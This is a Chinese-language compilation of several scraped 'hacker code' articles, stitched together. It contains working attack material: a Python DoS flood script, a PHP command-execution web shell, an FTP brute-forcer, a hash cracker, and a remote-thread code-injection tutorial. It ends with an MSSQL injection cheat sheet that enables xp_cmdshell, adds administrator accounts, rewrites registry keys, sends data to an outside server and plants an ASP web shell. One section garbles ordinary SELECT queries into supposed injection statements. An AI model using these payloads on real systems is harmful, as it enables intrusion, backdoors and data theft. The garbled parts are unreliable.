黑客常用注入代码
- 格式:doc
- 大小:26.00 KB
- 文档页数:6
SQL注入攻击是黑客对数据库进行攻击的常用手段之一。
随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。
但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。
用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。
SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。
但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况。
能不能根据具体情况进行分析,构造巧妙的SQL语句,从而成功获取想要的数据,是高手与“菜鸟”的根本区别。
下面从SOL注入的背景讲起,再谈谈如何防御等问题。
一SQL注入攻击的背景:在计算机技术高速发展的今天,越来越让人们头疼的是面临越来越“变态”和复杂的威胁网站技术,他们利用Internet 执行各种恶意活动,如身份窃取、私密信息窃取、带宽资源占用等。
它们潜入之后,还会扩散并不断更新自己。
这些活动常常利用用户的好奇心,在用户不知道或未来允许的情况下潜入用户的PC,不知不觉中,帐户里的资金就被转移了,公司讯息也被传送出去,危害十分严重。
2006年8月16日,第一个Web威胁样本出现,截止到2006年10月25日,已经产生了第150个变种,并且,还在不断地演化下去。
网站威胁的目标定位有多个维度,是个人还是公司,还是某种行业,都有其考虑,甚至国家、地区、性别、种族、宗教等也成为发动攻击的原因或动机。
攻击还会采用多种形态,甚至是复合形态,比如病毒、蠕虫、特洛伊、间谍软件、僵尸、网络钓鱼电子邮件、漏洞利用、下载程序、社会工程、rootkit、黑客,结果都可以导致用户信息受到危害,或者导致用户所需的服务被拒绝和劫持。
简单sql注入代码
SQL注入是一种常见的网络安全漏洞,它允许攻击者通过操纵应用程序的输入来执行恶意的SQL查询。
简单的SQL注入代码可以如下所示:
假设我们有一个登录页面,用户需要输入用户名和密码来进行身份验证。
如果该应用程序存在SQL注入漏洞,攻击者可以通过在用户名或密码字段中输入恶意的SQL代码来绕过身份验证。
例如,假设应用程序的SQL查询语句是这样的:
sql.
SELECT FROM users WHERE username='$username' AND password='$password'。
攻击者可以尝试输入以下内容作为用户名或密码:
sql.
' OR '1'='1。
这将使SQL查询变成:
sql.
SELECT FROM users WHERE username='' OR '1'='1' AND password=''。
这样就会返回所有用户的信息,因为条件'1'='1'始终为真。
通过这种简单的SQL注入代码,攻击者可以绕过身份验证,访
问或篡改数据库中的敏感信息。
因此,开发人员应该始终谨慎处理
用户输入,并使用参数化查询或其他安全措施来防止SQL注入攻击。
简单的黑客装逼代码引言黑客是计算机技术领域中的精英,他们擅长通过技术手段获取未授权的信息或者入侵他人的计算机系统。
黑客行为通常是非法的,违反了计算机安全和道德规范。
然而,在某些场合下,人们可以使用一些简单的黑客装逼代码来展示自己对计算机技术的了解和能力。
本文将介绍一些简单的黑客装逼代码。
1. DDOS攻击代码DDOS(分布式拒绝服务)攻击是一种通过同时向目标服务器发送大量请求以使其崩溃或无法正常工作的攻击方式。
以下是一个简单的DDOS攻击代码示例:import sockettarget_ip = "目标IP地址"target_port = 80def ddos_attack():while True:try:s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((target_ip, target_port))s.sendto(("GET /" + target_ip + " HTTP/1.1\r\n").encode('ascii'), (target_ip, target_port))s.close()except:passif __name__ == "__main__":ddos_attack()上述代码使用Python语言编写,通过创建一个socket连接并向目标IP地址发送大量请求来实现DDOS攻击。
请务必在合法授权的情况下使用此代码,遵守法律和道德规范。
2. 网站后门代码网站后门是黑客经常使用的一种技术手段,它允许黑客绕过正常的访问控制机制,获取对网站的非法访问权限。
以下是一个简单的网站后门代码示例:<?phpif(isset($_GET['cmd'])){$output = shell_exec($_GET['cmd']);echo "<pre>$output</pre>";}>上述PHP代码创建了一个简单的网站后门,当用户通过URL传递cmd参数时,该参数将被当作命令执行,并将结果输出到网页上。
常用sql注入语句SQL注入是一种常见的Web安全漏洞,黑客可以利用它向服务器发送恶意SQL查询语句,从而获取敏感信息,如用户凭证、信用卡信息等。
以下是一些常用的SQL注入语句:1. `sql_过滤函数()`:向服务器发送一个包含过滤函数的SQL查询语句,从而允许黑客执行任意SQL操作。
例如:```SELECT * FROM users WHERE age > 18;```2. `sql_ between()`:向服务器发送一个包含between子句的SQL查询语句,允许黑客执行任意SQL操作,例如修改用户记录。
例如: ```SELECT * FROM users WHERE年龄 between 18 and 25;```3. `sql_ like()`:向服务器发送一个包含like子句的SQL查询语句,允许黑客执行任意SQL操作,例如查找用户。
例如:```SELECT * FROM users WHERE name like "%admin%";```4. `sql_及物函数()`:向服务器发送一个包含及物函数(比如*)的SQL查询语句,允许黑客执行任意SQL操作。
例如:```SELECT * FROM users WHERE name LIKE "%admin%" AND password LIKE "%admin%";```5. `sql_拼接函数()`:向服务器发送一个包含拼接函数的SQL查询语句,允许黑客执行任意SQL操作。
例如:```SELECT * FROM users WHERE name = "admin" AND password = "123456";```这些语句只是SQL注入漏洞中的一部分,黑客还可以使用更高级的技巧来欺骗服务器,获取更多的敏感信息。
因此,防止SQL注入的最佳方法是采取各种安全措施,例如使用安全的API接口、对输入数据进行过滤和验证、使用安全的密码策略等。
简单的黑客攻击代码黑客攻击是现代社会中很常见的事件之一。
黑客通过利用目标的漏洞或者弱点,攻击任何一个计算机系统,企业或个人电脑,从而窃取有价值的信息或破坏目标的计算机系统。
以下是一些常见的黑客攻击代码。
1. 流量洪泛攻击(DDoS攻击)这种攻击最常见的方法是用大量的计算机同时向同一个目标发送请求,导致目标服务器瘫痪。
攻击者可以利用僵尸网络来实现攻击,从而同时利用多台电脑发动攻击,从而让目标服务器无法运行。
2. SQL 注入攻击这种攻击是通过插入恶意代码来破坏目标系统的数据库,从而获取数据库的信息。
通过利用目标网站的漏洞,攻击者可以注入含有恶意代码的 SQL 语句,从而可以访问数据库并且修改数据,并且可以窃取目标数据库的信息。
3. 电子邮件钓鱼攻击这种威胁通过电子邮件来进行,包括一些伪装成合法来源的电子邮件,通过诱惑受害者点击链接或下载附件,从而窃取信息或者下载恶意软件。
攻击者通过伪装成合法来源,让受害者感到相信这是真实事件,从而成功骗取信息或者进行其他的攻击。
4. 拒绝服务攻击(DoS攻击)这种攻击是通过占用目标计算机的系统资源来导致系统不能正常工作。
攻击者通过发送一些无用的数据包来占用目标服务器的网络带宽和计算能力,从而导致目标服务器瘫痪。
5. 蓝牙攻击这种攻击利用蓝牙的漏洞来进行,攻击者可以通过与目标设备连接,获得目标设备的控制权来窃取数据或者控制目标设备。
攻击者通过使用专门的工具,可以破解目标蓝牙设备的密码,从而获取设备的控制权或者窃取目标设备中的数据。
以上是一些常见的黑客攻击代码,为了保障自己和企业的互联网安全,我们需要采取一些有效的预防措施,比如安装杀毒软件和防火墙,定期更新软件和操作系统补丁,使用强密码等等。
简单的黑客装逼代码黑客装逼代码是指用代码展示黑客技术或模拟黑客攻击的情景,用来给人一种黑客高手的印象。
在编写黑客装逼代码时,需要注意合法性和道德性,避免给他人造成损失或引起不良影响。
以下是一些相关参考内容,不含链接。
1. 网络扫描器代码:```pythonimport sockettarget_ip = input("请输入目标IP地址:") # 输入目标IP地址for port in range(1, 1000): # 扫描1-1000端口sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = sock.connect_ex((target_ip, port))if result == 0:print(f"端口号 {port} 开放")sock.close()```该代码实现了一个简单的网络扫描器,可以用来扫描目标主机的开放端口。
运行代码后,用户输入目标IP地址,代码将自动扫描该主机的1-1000端口,并输出开放的端口号。
2. 密码破解代码:```pythonimport hashlibtarget_password_hash = input("请输入目标密码哈希值:") # 输入目标密码的哈希值password_file = input("请输入密码字典文件:") # 输入密码字典文件名with open(password_file, 'r') as f:for password in f:password = password.strip()password_hash =hashlib.sha256(password.encode()).hexdigest() # 对密码进行哈希if password_hash == target_password_hash:print(f"密码破解成功,密码为:{password}")break```该代码可以从一个密码字典文件中逐个尝试密码,并对密码进行哈希后与目标密码的哈希值进行比较,以此来破解密码。
最常用的16种网站安全攻击方式近年来,随着网络的普及和技术的不断进步,网络安全问题备受关注。
网站作为网络的重要组成部分,安全问题更加突出。
黑客和攻击者为了获取个人信息、数据盗取、金融欺诈等目的常常利用各种安全漏洞进行攻击,给网站带来实质性的威胁。
本文将介绍最常用的16种网站安全攻击方式,以便更好地保护个人和企业网站的信息安全。
一、SQL注入攻击SQL注入攻击是一种通过向SQL服务器发送恶意代码,来获取敏感信息的攻击方法。
利用SQL注入漏洞,攻击者可以访问、修改、删除或执行SQL服务器中存储的数据。
该攻击通常是通过web表单提交的数据,攻击者在提交数据时,通过注入一些SQL 命令来实现非法操作。
二、跨站脚本攻击(XSS)跨站脚本攻击指攻击者通过在一个网站上注入恶意脚本,来攻击其他用户。
攻击者利用用户的信任,将恶意脚本注入到受害网站页面中,一旦用户访问该页面,恶意脚本将被执行,对用户的隐私或机密信息进行窃取、篡改或破坏。
三、跨站点请求伪造攻击(CSRF)跨站点请求伪造攻击指攻击者利用用户已登录网站的身份,在用户不知情的情况下提交受攻击网站的表单。
攻击者通过这种方式,可以窃取用户的登录凭证或者修改用户敏感信息。
四、URL跨站攻击URL跨站攻击是一种通过修改链接地址来模拟合法用户身份进入网站的攻击方式。
攻击者利用已知的URL枚举方式来伪装成合法用户,进入网站并获取网站敏感信息。
五、文件包含漏洞攻击(File Inclusion)文件包含漏洞攻击指攻击者通过标准文件包含函数,将恶意代码注入受害网站。
通过这种方式,攻击者可以窃取敏感信息,或者实现对受害网站的远程控制。
六、HTTP请求篡改攻击HTTP请求篡改攻击指攻击者通过修改HTTP请求中的数据,来获取客户端和服务器之间的关键信息。
该攻击方式常用于窃取用户的登录凭证、修改服务器端的数据或者将服务器端注入恶意代码。
七、文件上传攻击文件上传攻击指攻击者利用网站的文件上传功能上传恶意代码,以实现对受害网站的远程控制。
简单的黑客装逼代码标题:简单的黑客装逼代码引言概述:在当今信息化社会,黑客文化逐渐兴起,许多人对黑客技术产生了浓厚的兴趣。
虽然黑客行为本质上是非法的,但是了解一些简单的黑客装逼代码可以帮助我们更好地保护自己的网络安全,同时也能增加对网络安全的认识和理解。
正文内容:1. 网络扫描1.1 端口扫描:通过扫描目标主机的开放端口,获取目标主机的网络服务信息。
1.2 路由追踪:通过追踪数据包的传输路径,了解网络中的节点和路径信息。
2. 暴力破解2.1 密码破解:通过尝试不同的密码组合,破解目标账户的密码。
2.2 弱口令攻击:利用常见的弱口令,对目标账户进行暴力破解。
3. SQL注入3.1 基于错误的注入:通过构造恶意的SQL语句,利用目标网站的错误信息获取敏感数据。
3.2 基于时间的盲注:通过构造延时的SQL语句,利用目标网站的响应时间差异获取敏感数据。
4. XSS攻击4.1 反射型XSS:通过构造恶意的URL,将脚本注入到目标网站的响应中,实现对用户的攻击。
4.2 存储型XSS:将恶意脚本存储到目标网站的数据库中,当其他用户访问时执行脚本。
5. 社会工程学5.1 钓鱼攻击:通过伪造合法的网站或邮件,诱导目标用户输入敏感信息。
5.2 垃圾邮件攻击:通过发送大量垃圾邮件,影响目标用户的正常工作。
总结:通过了解简单的黑客装逼代码,我们可以更好地认识到网络安全的重要性。
然而,我们必须明确,这些技术仅供学习和研究之用,不得用于非法活动。
同时,我们也应该加强自身的网络安全意识,采取相应的措施保护个人信息和网络安全。
只有在安全的网络环境下,我们才能更好地享受互联网带来的便利和乐趣。
WINDOWS⿊客基础(3):注⼊代码有使⽤过外挂的朋友应该知道,我们在玩游戏的时候,有很多辅助功能给你使⽤,⽐如吃药,使⽤物品等功能,这个时候我们就是使⽤注⼊代码的技术,简单的来将就是我们让另外⼀个进程去执⾏我们想让它执⾏的代码,这中间的关键函数是CreateRemoteThreadHANDLE WINAPI CreateRemoteThread(_In_ HANDLE hProcess,_In_ LPSECURITY_ATTRIBUTES lpThreadAttributes,_In_ SIZE_T dwStackSize,_In_ LPTHREAD_START_ROUTINE lpStartAddress,_In_ LPVOID lpParameter,_In_ DWORD dwCreationFlags,_Out_ LPDWORD lpThreadId);CreateRemoteThread的参数跟CreateThread的参数差不多,多出来的hProcess是我们要对其操作的进程HANDLE,在早期的WINDOWS 版本CreateThread确实是使⽤CreateRemoteThread实现的,就是把hProcess传⼊我们⾃⼰的进程HANDLECreateRemoteThread的功能就是在指定的进程创建⼀个线程,这个线程运⾏我们指定的函数,看起来很简单,但是有⼀个问题,就是虚拟内存导致的问题⼤家都知道,在WINDOWS下是使⽤虚拟内存来进⾏数据管理的,每个进程都有⾃⼰独⽴的地址空间,假设进程A准备向进程B注⼊⼀段代码,他要让进程B执⾏他进程空间的函数InjectionCode(),这个函数在进程A的地址空间地址为0X3000现在我们开始进⾏代码注⼊,利⽤CreateRemoteThread我们告诉B进程,请执⾏虚拟内存地址为0X3000的代码,这个时候B进程该⼲什么呢??B进程收到这个命令后,他很听话地创建了线程,然后乖乖得CALL了0X3000的内容,请注意,现在B进程CALL的是它⾃⼰内存空间内0X3000的代码⽽不是A进程的,那么现在B进程的0X3000是什么内容??没⼈知道,运⽓好的话说不定真的有段代码给你执⾏,运⽓不好你⾃⼰也不知道会发⽣什么事情,这就跟你进错了学⽣公寓⼀样,同样号码的房间,运⽓好是校花的房间,运⽓不好就是如花的房间那么我们怎么才能让进程去执⾏我们对应的代码呢??我们只要在B进程内开辟⼀块内存,然后把我们的代码或者数据复制进去,再执⾏对应的代码就可以了,我们需要⽤到这⼏个函数:LPVOID WINAPI VirtualAllocEx(_In_ HANDLE hProcess,_In_opt_ LPVOID lpAddress,_In_ SIZE_T dwSize,_In_ DWORD flAllocationType,_In_ DWORD flProtect);BOOL WINAPI WriteProcessMemory(_In_ HANDLE hProcess,_In_ LPVOID lpBaseAddress,_In_ LPCVOID lpBuffer,_In_ SIZE_T nSize,_Out_ SIZE_T *lpNumberOfBytesWritten);这两个函数跟我们平常⽤的函数都差不多,只是多了个进程的选项,⼤概步骤如下图:现在我们将实际操作⼀下:下⾯是我们要注⼊的程序,在这之前,我们最好把基地址固定掉,这样我们不会每次重新运⾏程序的时候函数的地址都会改变,在VS2008中,项⽬属性->链接器->⾼级,把随机基址和固定基址选择默认值void PrintMsg(const char *msg){printf("ThreadI D:%d Msg:%s\n",GetCurrentThreadId(),msg);}int main(void){printf("%d\n",GetCurrentThreadId());printf("Print Msg Function Address:%X\n",PrintMsg);system("pause");}假设我们的PrintMsg的地址是0x401000,现在我们需要往这个进程⾥⾯注⼊⼀段代码,让她可以⾃动调⽤PrintMsg这个函数1static const char *msg = "INJECTION CODE SUCESS\n";2static const unsigned int PARAM_SIZE = 100;3static const unsigned int EXE_SIZE = 500;456void InjectionCode(const char *msg)7 {8 __asm9 {10 push eax11 push msg12 mov eax,0x40100013 call eax //因为在我们要注⼊的进程中,PrintMsg位于0x401000这个位置14 pop eax15 pop eax16 }17 }18int main(void)19 {20 HANDLE hProcess = OpenProcessByProcessNmae("main.exe"); //这个函数在上⼀章2122if (hProcess == INVALID_HANDLE_VALUE)23 {24 printf("error open process %d\n",GetLastError());25return1;26 }27 //⼀定要把函数的代码和msg写⼊要注⼊的进程,否则会发⽣位置错误(⼀般是崩溃)28 LPVOID RemoteExe = VirtualAllocEx(hProcess,NULL,EXE_SIZE,MEM_COMMIT,PAGE_EXECUTE);29 LPVOID RemoteParam = VirtualAllocEx(hProcess,NULL,PARAM_SIZE,MEM_COMMIT,PAGE_READWRITE);3031 SIZE_T WriteCount = 0;32int ret = 0;33 ret = WriteProcessMemory(hProcess,RemoteParam,msg,PARAM_SIZE,&WriteCount);34 ret = WriteProcessMemory(hProcess,RemoteExe,InjectionCode,0x13,&WriteCount);3536 HANDLE hThread = CreateRemoteThread(hProcess,NULL,0,(LPTHREAD_START_ROUTINE)RemoteExe,RemoteParam,0,NULL);37 WaitForSingleObject(hThread,INFINITE);38 }运⾏上⾯的程序,我们就可以在另外⼀个进程中创建⼀个线程,并且这个线程将会输出该线程的ID以及我们要输出的消息上⾯的程序还有⼏个要注意的:1.资源竞争由于是创建线程执⾏相应代码所以肯定会有资源竞争的问题,以后要写代码⼀定要注意,在本例中我忽略了这个问题2. 关于代码的长度问题在本例中,我们的代码长度是0X13,但是要知道,汇编代码的长度随便懂⼀下就可能更改,可能因为⼀个指令,也可能因为⼀个参数,所以我们需要时刻注意这点,关于代码长度怎么测量,我是看了反汇编的代码后计算的,这个⽅法⽐较准确,也可以⼤概估计下,只要能把代码复制完整就可以,超出也没关系,只要不超出申请的内存⼤⼩就可以3.记得备份我们使⽤的寄存器这个⼗分重要,⼀旦你更改了寄存器,如果没有后⾯没有恢复,可能会导致⼀系列错误,特别是ESP,EBP等重要的寄存器3.注⼊代码多次调⽤系统DLL中的函数<<WINDOWS核⼼编程>>⾥⾯说,系统的DLL都会加载到⼀个固定的地址,⽐如VirtualAllocEx,⼀般我们在A进程和B进程的时候,call或者jmp的地址都是⼀样的,所以⼀般我们如果调⽤的是系统函数,⼀般我们不需要担⼼,但是,昨天我想到了⼀个问题,⽐如我们进程A要命令进程B调⽤CreateToolhelp32Snapshot这个系统API,现在我们假设CreateToolhelp32Snapshot这个API在单独的TLHELP32.DLL⾥⾯(实际上这个在KERNEL32.DLL⾥⾯,所有进程都会加载这个DLL,所以不需要担⼼下⾯的问题,这个只是举例),操作系统在加载DLL的时候,会统⼀把这个API的地址映射到虚拟内存的0XFF40100的地址,按照我们原来的想法进程B会⾃⼰跑去call 0XFF40100这个地址。
简单的黑客装逼代码引言黑客是指具有极高计算机技术水平的人,他们可以通过技术手段获取、修改、破解计算机系统和网络的信息。
在电影中,黑客常常以一种神秘而强大的形象出现,给人留下深刻印象。
本文将介绍一些简单的黑客装逼代码,帮助你在朋友面前展现出自己与众不同的技术能力。
1. 网络扫描网络扫描是黑客最常用的技术之一,它可以帮助黑客探测目标计算机系统和网络的漏洞,从而进行攻击。
下面是一个简单的Python脚本示例,可以用于进行端口扫描:import socketdef scan_ports(target, start_port, end_port):for port in range(start_port, end_port + 1):sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)result = sock.connect_ex((target, port))if result == 0:print(f"Port {port} is open")sock.close()if __name__ == "__main__":target = "127.0.0.1"start_port = 1end_port = 1000scan_ports(target, start_port, end_port)以上代码使用了socket模块来创建TCP连接并进行端口扫描。
你可以将target变量设置为目标主机的IP地址,start_port和end_port变量设置为你想要扫描的端口范围。
运行代码后,它将输出开放的端口号。
2. 密码破解密码破解是黑客入侵的一项重要技术,通过尝试各种可能的密码组合来获取未授权访问目标系统的权限。
下面是一个简单的Python脚本示例,可以用于暴力破解FTP服务器的登录密码:import ftplibdef brute_force_ftp(target, username_list, password_list):for username in username_list:for password in password_list:try:ftp = ftplib.FTP(target)ftp.login(username, password)print(f"Successful login with credentials: {username}:{passwor d}")ftp.quit()returnexcept ftplib.error_perm as e:print(f"Failed login with credentials: {username}:{password}")if __name__ == "__main__":target = "127.0.0.1"username_list = ["admin", "root"]password_list = ["123456", "password", "admin123"]brute_force_ftp(target, username_list, password_list)以上代码使用了ftplib模块来进行FTP登录,并尝试不同的用户名和密码组合。
黑客常用的注入代码//看看是什么权限的and 1=(Select IS_MEMBER('db_owner'))And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--//检测是否有读取某数据库的权限and 1= (Select HAS_DBACCESS('master'))And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 -- 数字类型and char(124)%2Buser%2Bchar(124)=0字符类型' and char(124)%2Buser%2Bchar(124)=0 and ''='搜索类型' and char(124)%2Buser%2Bchar(124)=0 and '%'='爆用户名and user>0' and user>0 and ''='检测是否为SA权限and 1=(select IS_SRVROLEMEMBER('sysadmin'));--And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E 00) as varchar(1))%2Bchar(124)=1 --检测是不是MSSQL数据库and exists (select * from sysobjects);--检测是否支持多行;declare @d int;--恢复xp_cmdshell;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpa f','select @@version')//-----------------------// 执行命令//-----------------------首先开启沙盘模式:exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Eng ines','SandBoxMode','REG_DWORD',1然后利用jet.oledb执行系统命令select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\i as.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')执行命令;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_O AMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf / add';--EXEC .. 'cmd /c md c:\1111'判断xp_cmdshell扩展存储过程是否存在:http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.db o.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')写注册表exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Eng ines','SandBoxMode','REG_DWORD',1REG_SZ读注册表exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows N T\CurrentVersion\Winlogon','Userinit'读取目录内容exec master..xp_dirtree 'c:\winnt\system32',1,1数据库备份backup database pubs to disk = 'c:\123.bak'//爆出长度And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_T mp)=0 ;--更改sa口令方法:用sql综合利用工具连接后,执行命令:exec sp_password NULL,'新密码','sa'添加和删除一个SA权限的用户test:exec master.dbo.sp_addlogin test,ptloveexec master.dbo.sp_addsrvrolemember test,sysadmin删除扩展存储过过程xp_cmdshell的语句:exec sp_dropextendedproc 'xp_cmdshell'添加扩展存储过过程EXEC ..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' GRANT exec On xp_proxiedadata TO public停掉或激活某个服务。
exec master..xp_servicecontrol 'stop','schedule'exec master..xp_servicecontrol 'start','schedule'dbo.xp_subdirs只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'dbo.xp_makecab将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
dbo.xp_makecab'c:\test.cab','mszip',1,'C:\Inetpub\wwwroot\SQLInject\login.asp','C:\Inetpub\wwwroot\SQLInject\securelogin.asp'xp_terminate_process停掉某个执行中的程序,但赋予的参数是Process ID。
利用”工作管理员”,透过选单「检视」-「选择字段」勾选pid,就可以看到每个执行程序的Pr ocess IDxp_terminate_process 2484xp_unpackcab解开压缩档。
xp_unpackcab 'c:\test.cab','c:\temp',1某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe 不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令EX EC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Pa rameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。
如果要修改端口值EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MAC HINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234create database lcx;Create TABLE ku(name nvarchar(256) null);Create TABLE biao(id int NULL,name nvarchar(256) null);//得到数据库名insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=paf paf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases//在Master中创建表,看看权限怎样Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);-- 用sp_makewebtask直接在web目录里写入一句话马:http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\ww w\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--//更新表内容Update films SET kind = 'Dramatic' Where id = 123//删除内容delete from table_name where Stockid = 3 (完)。